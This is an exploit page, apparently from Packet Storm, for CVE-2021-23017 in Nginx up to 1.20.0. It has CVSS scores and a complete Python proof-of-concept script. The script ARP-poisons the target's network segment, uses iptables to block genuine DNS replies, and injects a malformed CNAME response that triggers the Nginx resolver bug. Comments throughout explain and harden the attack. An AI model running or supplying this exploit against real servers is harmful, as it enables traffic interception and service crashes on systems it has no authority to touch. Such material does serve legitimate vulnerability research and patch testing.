
Nginx 1.20.0 Denial Of Service

2022-07-11 00:00:00
Mohammed Alshehri
packetstormsecurity.com

9.4 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

`# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)  
# Date: 2022-6-29  
# Exploit Author: Mohammed Alshehri - https://Github.com/M507  
# Vendor Homepage: https://nginx.org/  
# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0  
# Version: 0.6.18 - 1.20.0  
# Tested on: Ubuntu 18.04.4 LTS bionic   
# CVE: CVE-2021-23017  
# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn  
# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1  
# The target nginx must use its own resolver (the `resolver` directive) pointed at --dns_server; lookups that go through the system libc resolver never reach the vulnerable code path, so this PoC does nothing against such a host. The script itself needs root (ip_forward, iptables, raw sockets) and ARP-poisons the target's LAN segment.  
  
# Third-party star import kept first on purpose: any stdlib name scapy.all
# also re-exports is then shadowed by the explicit imports below, as before.
from scapy.all import *

import argparse
import os
import subprocess
import time
from binascii import hexlify, unhexlify
from multiprocessing import Process
  
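def device_setup():
    """Turn this host into a transparent forwarder that swallows DNS.

    Enables IPv4 forwarding so the ARP-poisoned target keeps working for
    everything except DNS, and adds a FORWARD rule dropping UDP/53 so the
    genuine resolver's answer never reaches the target -- only the spoofed
    answer built in process_received_packet() does.

    Raises:
        PermissionError: when not running as root (the original silently
            continued after a failed ``echo`` / ``iptables``).
        subprocess.CalledProcessError: when iptables exits non-zero.

    NOTE(review): nothing here is undone on exit. Remove the rule by hand
    with ``iptables -D FORWARD -p UDP --dport 53 -j DROP`` when finished.
    """
    if os.geteuid() != 0:
        raise PermissionError("device_setup() needs root to change ip_forward and iptables")
    # Write the sysctl directly instead of shelling out to ``echo ... >>``;
    # for a procfs control file append vs truncate makes no difference.
    with open("/proc/sys/net/ipv4/ip_forward", "w") as sysctl:
        sysctl.write("1")
    # Argument list, no shell: the arguments are fixed, but the list form is
    # the idiom and check=True surfaces a failed iptables instead of ignoring it.
    subprocess.run(
        ["iptables", "-A", "FORWARD", "-p", "UDP", "--dport", "53", "-j", "DROP"],
        check=True,
    )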
  
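def ARPP(target, dns_server):
    """Keep both ends of the target<->resolver path ARP-poisoned, forever.

    Every two seconds sends two unsolicited ARP replies (op=2): one telling
    ``target`` that ``dns_server``'s IP lives at this host's MAC (scapy's
    default hwsrc), and one telling ``dns_server`` the same about ``target``.
    Both peers then route their DNS exchange through this host.

    Args:
        target: IPv4 address of the nginx host being attacked.
        dns_server: IPv4 address of the resolver nginx is configured to use.

    Raises:
        RuntimeError: if either MAC cannot be resolved (host down, wrong
            subnet). The original carried on with ``hwdst=None`` and
            poisoned nothing useful.

    Never returns; main() runs it in its own Process. The peers' ARP caches
    are not restored on exit.
    """
    print("[*] Sending poisoned ARP packets")
    target_mac = getmacbyip(target)
    dns_server_mac = getmacbyip(dns_server)
    if target_mac is None or dns_server_mac is None:
        raise RuntimeError(
            "could not resolve MAC for target={} ({}) or dns_server={} ({})".format(
                target, target_mac, dns_server, dns_server_mac
            )
        )
    while True:
        time.sleep(2)
        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac), verbose=0)
        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac), verbose=0)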
  
def exploit(target):
    """Block on a live capture of UDP/53 traffic to or from ``target``.

    Each captured packet is handed to process_received_packet(), which
    decides whether it is a query from the target and, if so, forges the
    answer. Runs until the capture is interrupted; main() starts it in a
    separate Process.
    """
    print("[*] Listening ")
    bpf = "udp and port 53 and host {}".format(target)
    sniff(filter=bpf, prn=process_received_packet)
  
"""  
RFC schema  
0 1 2 3  
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| LENGTH | ID |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| ANCOUNT | NSCOUNT |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| ARCOUNT | QD |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| AN | NS |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| AR |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
  
Fig. DNS   
  
"""  
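# Fixed tail of the forged reply, byte-for-byte from the original PoC:
#   C0 0C            NAME: compression pointer to offset 12 (the QNAME)
#   00 05 00 01      TYPE CNAME, CLASS IN
#   00 00 0E 10      TTL 3600
#   00 0B            RDLENGTH 11 ...
#   18 'A'*24 C0 04  ... but 27 bytes of RDATA follow: a 24-byte label and a
#                    pointer to offset 4 (inside the header).
# The RDLENGTH/RDATA mismatch and the pointer are the CVE-2021-23017 trigger;
# do not "fix" these bytes.
_CNAME_ANSWER = (
    b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10"
    b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
)


def _forge_cname_answer(dns_request):
    """Build the malformed DNS answer for one captured query.

    Echoes the query's ID, QNAME, QTYPE and QCLASS, sets flags 0x8180
    (response, RD, RA, NOERROR) with QDCOUNT=1 / ANCOUNT=1, and appends
    ``_CNAME_ANSWER``.

    Args:
        dns_request: raw bytes of the DNS query (12-byte header + question).

    Returns:
        The answer as bytes, or None when no 0x00 QNAME terminator exists
        after the header (the original then sliced with index -1 and sent
        garbage).
    """
    null_pointer_index = bytes(dns_request).find(0x00, 12)
    if null_pointer_index < 0:
        return None
    parts = [
        dns_request[0:2],                                            # ID
        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",                 # flags + counts
        dns_request[12:null_pointer_index + 1],                      # QNAME incl. terminator
        dns_request[null_pointer_index + 1:null_pointer_index + 3],  # QTYPE
        dns_request[null_pointer_index + 3:null_pointer_index + 5],  # QCLASS
        _CNAME_ANSWER,
    ]
    return b"".join(parts)


def process_received_packet(received_packet):
    """Scapy sniff callback: answer the target's DNS query with the forged reply.

    Only packets whose IPv4 source is the module global ``target_ip`` and
    which carry a DNS question (DNSQR) are handled; anything else -- including
    non-IPv4 traffic that the "udp and port 53" filter also matches, which
    made the original raise on ``received_packet[IP]`` -- is ignored. The
    reply swaps the captured packet's IP addresses and UDP ports and is
    injected at layer 2 with sendp(); the genuine resolver's answer is
    dropped by the iptables rule from device_setup().

    Errors while building or sending are printed and the packet skipped so
    the capture keeps running. Only Exception is caught: the original bare
    ``except:`` also swallowed KeyboardInterrupt, making Ctrl-C unreliable.
    """
    if IP not in received_packet or received_packet[IP].src != target_ip:
        return
    if not received_packet.haslayer(DNS) or DNSQR not in received_packet:
        return
    print("[*] the received packet: " + str(bytes_hex(received_packet)))
    print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
    try:
        dns_request = received_packet[DNS].build()
        payload = _forge_cname_answer(dns_request)
        if payload is None:
            print("[-] no QNAME terminator in query, skipping packet")
            return
        spoofed_pkt = (
            Ether()
            / IP(dst=received_packet[IP].src, src=received_packet[IP].dst)
            / UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)
            / payload
        )
        print("[+] dns answer: " + str(hexlify(payload)))
        print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))
        sendp(spoofed_pkt, count=1)
        print("\n[+] malicious answer was sent")
        print("[+] exploited\n")
    except Exception as exc:
        print("\n[-] ERROR: {!r}".format(exc))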
  
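def main():
    """Parse arguments, prepare the host, and run the ARP spoofer and sniffer.

    Two worker processes are started: ARPP() keeps the target and its
    resolver poisoned, exploit() sniffs the target's DNS queries and answers
    them. ``target_ip`` is a module global read by process_received_packet()
    inside the sniffer process; that relies on the fork start method (the
    Linux default), under which the child inherits the parent's globals.

    Both options are required; the original accepted neither and then ran
    with ``target_ip=None``. Ctrl-C terminates both workers. The iptables
    rule and ip_forward change made by device_setup() are not undone.
    """
    global target_ip
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", required=True,
                        help="IP address of the target")
    parser.add_argument("-r", "--dns_server", required=True,
                        help="IP address of the DNS server used by the target")
    args = parser.parse_args()
    target_ip = args.target
    dns_server_ip = args.dns_server
    device_setup()
    processes_list = [
        Process(target=ARPP, args=(target_ip, dns_server_ip)),
        Process(target=exploit, args=(target_ip,)),
    ]
    for process in processes_list:
        process.start()
    try:
        for process in processes_list:
            process.join()
    except KeyboardInterrupt:
        # Both workers loop forever; stop them so Ctrl-C actually ends the run.
        for process in processes_list:
            process.terminate()
        for process in processes_list:
            process.join()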
  
if __name__ == '__main__':
    # Placeholder only; main() overwrites it from --target before any
    # packet is processed.
    target_ip = ""
    main()
  
  
`
